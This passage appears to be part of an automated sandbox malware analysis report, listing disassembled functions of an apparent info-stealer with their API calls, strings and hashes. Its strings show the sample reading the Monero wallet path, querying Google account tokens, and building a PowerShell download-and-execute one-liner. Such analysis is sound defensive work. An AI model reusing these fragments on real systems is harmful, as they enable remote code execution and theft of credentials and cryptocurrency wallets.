                                                                                                                                                                                                                                                          • Opcode ID: 6eb41064430d17aac5e6356850140a33cf091c7d56485a4e907f4d87a1ebe37b
                                                                                                                                                                                                                                                          • Instruction ID: ccb287c379e923152649f76ea6e82cdd2cfe215e74b7f381e344429a6c3e2c23
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6eb41064430d17aac5e6356850140a33cf091c7d56485a4e907f4d87a1ebe37b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6741D132A00249EBDF219FA6DC45BDE7B76EB44760F208035FA04AA190D3798A55EB90
                                                                                                                                                                                                                                                          Function 00FF24D3 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00FF24DD
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FF2515
                                                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00FF2529
                                                                                                                                                                                                                                                          • EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00FF2546
                                                                                                                                                                                                                                                          • GetModuleBaseNameA.PSAPI(00000000,?,?,00000104), ref: 00FF2563
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00FF256A
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Process$BaseCloseEnumH_prolog3_catch_HandleModuleModulesNameOpen_memset
                                                                                                                                                                                                                                                          • String ID: <unknown>
                                                                                                                                                                                                                                                          • API String ID: 445794743-1574992787
                                                                                                                                                                                                                                                          • Opcode ID: 4beafc10a7a153bfc81587b5c19bca139e3014d248241529faa1c19e97333060
                                                                                                                                                                                                                                                          • Instruction ID: 472661390eca24c2ed35defddfc9c0bb6cf5d6404564b459a15ece6fe7c67ed4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4beafc10a7a153bfc81587b5c19bca139e3014d248241529faa1c19e97333060
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78112A7294012DABDB22EF50CC85ADEB6B8BF09300F4440A1FB88E7150D7755E859F91
                                                                                                                                                                                                                                                          Function 00FE1A41 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 35registrymemoryCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00FE1A55
                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00FE1A5C
                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00FE1AD9), ref: 00FE1A79
                                                                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(00FE1AD9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00FE1A94
                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00FE1AD9), ref: 00FE1A9D
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          • wallet_path, xrefs: 00FE1A8C
                                                                                                                                                                                                                                                          • SOFTWARE\monero-project\monero-core, xrefs: 00FE1A6F
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                          • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                                                                                                                                                                                                                                          • API String ID: 3466090806-4244082812
                                                                                                                                                                                                                                                          • Opcode ID: 991ca2a32529bb280d976499ec5b07f2e3fbbb594f56c624d4b1fe1c7dfa6803
                                                                                                                                                                                                                                                          • Instruction ID: 047efdc2d80dc72cebf4df2d72e1c56fd83741b8fa16441363ae60c6b1553783
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 991ca2a32529bb280d976499ec5b07f2e3fbbb594f56c624d4b1fe1c7dfa6803
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BDF05E76640305BFEB208B91EC0EFAE7AB9EB80B04F644024F701E5188E6F15A449B64
                                                                                                                                                                                                                                                          Function 00FE9AA3 Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 222stringCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00FE9C45
                                                                                                                                                                                                                                                            • Part of subcall function 00FF2042: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00FF6B0E,?), ref: 00FF205A
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,AccountId), ref: 00FE9C62
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00FE9D11
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00FE9D2C
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcpylstrlen$lstrcat$AllocLocal
                                                                                                                                                                                                                                                          • String ID: AccountId$GoogleAccounts$GoogleAccounts$SELECT service, encrypted_token FROM token_service
                                                                                                                                                                                                                                                          • API String ID: 3306365304-1713091031
                                                                                                                                                                                                                                                          • Opcode ID: a10a0e1a11f63eca3e5054fa528d301215f87e15206eec21a957b1e6d38b48d7
                                                                                                                                                                                                                                                          • Instruction ID: f7723821b9d0617f8e3133eb024ac191b2c83d10ff6dd7d623231524ca22a8f5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a10a0e1a11f63eca3e5054fa528d301215f87e15206eec21a957b1e6d38b48d7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB81F632900159ABCF40FBB6ED469EEB774AF04304F510421FA00B7166DBBABE45ABD0
                                                                                                                                                                                                                                                          Function 6CD64166 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • type_info::operator==.LIBVCRUNTIME ref: 6CD64285
                                                                                                                                                                                                                                                          • ___TypeMatch.LIBVCRUNTIME ref: 6CD64393
                                                                                                                                                                                                                                                          • CallUnexpected.LIBVCRUNTIME ref: 6CD64500
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CallMatchTypeUnexpectedtype_info::operator==
                                                                                                                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                                                                                                                          • API String ID: 1206542248-393685449
                                                                                                                                                                                                                                                          • Opcode ID: 1a7227f8a6beeb7cad78df4554e20b88dd6cbd64e0bb3943ea998c1dc4eebcd9
                                                                                                                                                                                                                                                          • Instruction ID: 2d6dc12a98580103cdde8be4c93634aed3c8f50c289a4f938a0cd733b5b94042
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a7227f8a6beeb7cad78df4554e20b88dd6cbd64e0bb3943ea998c1dc4eebcd9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1B1AE75801209EFCF05CFA6C8909DEBBB5FF08318F24465AE8106BE21D771EA55CBA1
                                                                                                                                                                                                                                                          Function 6CD4ABE0 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 250COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 6CD4AD37
                                                                                                                                                                                                                                                          • GetEnvironmentVariableW.KERNEL32(?,00000002,00000000), ref: 6CD4AD42
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 6CD4AD4E
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 6CD4AD60
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          • internal error: entered unreachable codeassertion failed: self.is_char_boundary(new_len)/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\string.rs, xrefs: 6CD4AEC3
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast$EnvironmentVariable
                                                                                                                                                                                                                                                          • String ID: internal error: entered unreachable codeassertion failed: self.is_char_boundary(new_len)/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\string.rs
                                                                                                                                                                                                                                                          • API String ID: 2691138088-1921098361
                                                                                                                                                                                                                                                          • Opcode ID: 841b54c9bfa255c83020ec056c58db4ebba05f7cc92109e6fad8f1e084f1bd2a
                                                                                                                                                                                                                                                          • Instruction ID: c8f9c4958f8fce1d1d83ff28d1690f7f40a8a5329124a59980f278b294c9e4c1
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 841b54c9bfa255c83020ec056c58db4ebba05f7cc92109e6fad8f1e084f1bd2a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7A19CB5E00219DFEB10CF94DC45B9EBBB9BF48718F144124EA18BB761E7309948CBA0
                                                                                                                                                                                                                                                          Function 6CD4A9E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 141COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 6CD4AAA7
                                                                                                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000002), ref: 6CD4AAAF
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 6CD4AABB
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 6CD4AACD
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 6CD4AB5D
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          • internal error: entered unreachable codeassertion failed: self.is_char_boundary(new_len)/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\string.rs, xrefs: 6CD4AB8A
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast$CurrentDirectory
                                                                                                                                                                                                                                                          • String ID: internal error: entered unreachable codeassertion failed: self.is_char_boundary(new_len)/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\string.rs
                                                                                                                                                                                                                                                          • API String ID: 3993060814-1921098361
                                                                                                                                                                                                                                                          • Opcode ID: 98f8167fda4f1bb0c2db178868d9db81449babb320ceeab1c162ba6e010fb0b0
                                                                                                                                                                                                                                                          • Instruction ID: 7994b3eaa615d54691d32d71b46b23d5bf6546d585ffd4f806ac1163290cfbf9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 98f8167fda4f1bb0c2db178868d9db81449babb320ceeab1c162ba6e010fb0b0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D51F5B1D006189BEB10CF98D989BEEBBB9AF49714F148125E908B7750E7749908CBA1
                                                                                                                                                                                                                                                          Function 00FF2F3F Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 121COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1E6D: GetSystemTime.KERNEL32(?,010157AE,?), ref: 00FF1E9C
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
                                                                                                                                                                                                                                                          • ShellExecuteEx.SHELL32(?), ref: 00FF308F
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          • .ps1, xrefs: 00FF2FC2
                                                                                                                                                                                                                                                          • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00FF2FE7
                                                                                                                                                                                                                                                          • C:\ProgramData\, xrefs: 00FF2F72
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00FF302A
                                                                                                                                                                                                                                                          • ')", xrefs: 00FF2FE2
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
